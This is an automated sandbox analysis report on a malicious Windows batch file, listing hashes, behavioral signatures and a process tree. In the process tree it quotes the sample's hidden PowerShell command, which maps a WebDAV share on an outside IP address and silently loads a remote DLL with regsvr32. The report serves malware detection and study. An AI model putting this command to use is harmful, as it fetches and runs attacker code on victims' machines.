Analysis
-
max time kernel
142s -
max time network
113s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
19-07-2024 08:59
Static task
static1
Behavioral task
behavioral1
Sample
112673164042139404.bat
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
112673164042139404.bat
Resource
win10v2004-20240709-en
General
-
Target
112673164042139404.bat
-
Size
10KB
-
MD5
8b181914f45c517f8bd8776c09e170b1
-
SHA1
6b8faa1232321d67c1b863ec7a47ee5cef9564bc
-
SHA256
6c6926c5cf47f76bcdf50295c3ddc19a1507cec61520d14913a4f4e95b927a6d
-
SHA512
6cf229ba0aaee5ba8df6f25ed3f7bdb4f39dafa4cf43efb93e6b038d3522211120d3aee6201038fe133f020b9f378de7a89047eb0b6435b8ffa6de50c02b52d7
-
SSDEEP
192:WhZ35BIeXWmFYH3IiKtJT+bMt3L7JVU0UfgosA3DTe014QZxoCnBCzLpmavUIBTe:Wj352GqHhKtJT+gxJGgohzy01zXdEgaY
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 4028 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4028 powershell.exe 4028 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4028 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 1340 wordpad.exe 1340 wordpad.exe 1340 wordpad.exe 1340 wordpad.exe 1340 wordpad.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3424 wrote to memory of 1340 3424 cmd.exe 85 PID 3424 wrote to memory of 1340 3424 cmd.exe 85 PID 3424 wrote to memory of 4028 3424 cmd.exe 87 PID 3424 wrote to memory of 4028 3424 cmd.exe 87 PID 4028 wrote to memory of 4956 4028 powershell.exe 89 PID 4028 wrote to memory of 4956 4028 powershell.exe 89 PID 4028 wrote to memory of 4972 4028 powershell.exe 90 PID 4028 wrote to memory of 4972 4028 powershell.exe 90
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\112673164042139404.bat"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3424 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:1340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; regsvr32 /s \\45.9.74.36@8888\davwwwroot\125972149918806.dll2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.36@8888\davwwwroot\3⤵PID:4956
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\45.9.74.36@8888\davwwwroot\125972149918806.dll3⤵PID:4972
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc1⤵PID:2288
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82